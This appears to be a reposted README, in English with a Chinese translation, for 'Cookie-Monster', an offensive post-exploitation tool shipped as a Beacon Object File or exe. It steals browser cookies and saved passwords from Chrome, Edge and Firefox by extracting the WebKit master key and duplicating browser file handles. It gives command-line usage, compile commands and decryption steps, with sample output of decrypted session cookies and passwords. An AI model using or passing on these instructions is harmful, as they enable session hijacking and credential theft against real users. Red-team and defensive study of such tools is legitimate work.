Cookie-Monster – BOF To Steal Browser Cookies & Credentials

Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.
通过 BOF 或 exe 窃取 edge、chrome 和 firefox 的浏览器 cookie！Cookie-Monster 将提取 WebKit 主密钥，找到带有 Cookie 和登录数据文件句柄的浏览器进程，复制句柄，然后以无文件方式下载目标。下载Cookies/登录数据文件后，python 解密脚本可以帮助提取这些机密！Firefox 模块将解析profiles.ini并找到 logins.json 和 key4.db 文件所在的位置并下载它们。引用单独的 github 存储库进行脱机解密。

BOF Usage BOF 用法

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example: 
   cookie-monster --chrome 
   cookie-monster --edge 
   cookie-moster --firefox 
   cookie-monster --chromeCookiePID 1337
   cookie-monster --chromeLoginDataPID 1337
   cookie-monster --edgeCookiePID 4444
   cookie-monster --edgeLoginDataPID 4444
cookie-monster Options: 
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD 
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD 
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file 
    --chromeCookiePID, if chrome PI   D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file  
    --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file  

EXE usage EXE 用法

Cookie Monster Example:
  cookie-monster.exe --all 
Cookie Monster Options:
  -h, --help                     Show this help message and exit
  --all                          Run chrome, edge, and firefox methods
  --edge                         Extract edge keys and download Cookies/Login Data file to PWD
  --chrome                       Extract chrome keys and download Cookies/Login Data file to PWD
  --firefox                      Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps 解密步骤

Install requirements 安装要求

pip3 install -r requirements.txt

Base64 encode the webkit masterkey
Base64 对 webkit 主密钥进行编码

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File
解密 Chrome/Edge Cookie 文件

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File
解密 Chome/Edge 密码文件

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
解密 Firefox Cookie 和存储的凭据：
https://github.com/lclevy/firepwd

Installation 安装

Ensure Mingw-w64 and make is installed on the linux prior to compiling.
在编译之前，请确保 linux 上安装了 Mingw-w64 和 make。

make

to compile exe on windows
在 Windows 上编译 exe

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO 待办事项

• update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI
  更新 decrypt.py 以支持基于 firepwd 的 firefox，并添加基于 DonPAPI 的暴力破解模块

References 引用

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
如果没有 Mr-Un1k0d3r 和他令人惊叹的季节性视频的帮助，这个项目是不可能完成的！强烈建议您查看他的课程!!
Cookie Webkit Master Key Extractor: https://github.com/Mr–Un1k0d3r/Cookie–Graber–BOF
Cookie Webkit 主密钥提取器：https://githubcom/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
无文件下载：https://githubcom/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login–securite/DonPAPI
解密 Cookie 和登录数据：https://githubcom/login-securite/DonPAPI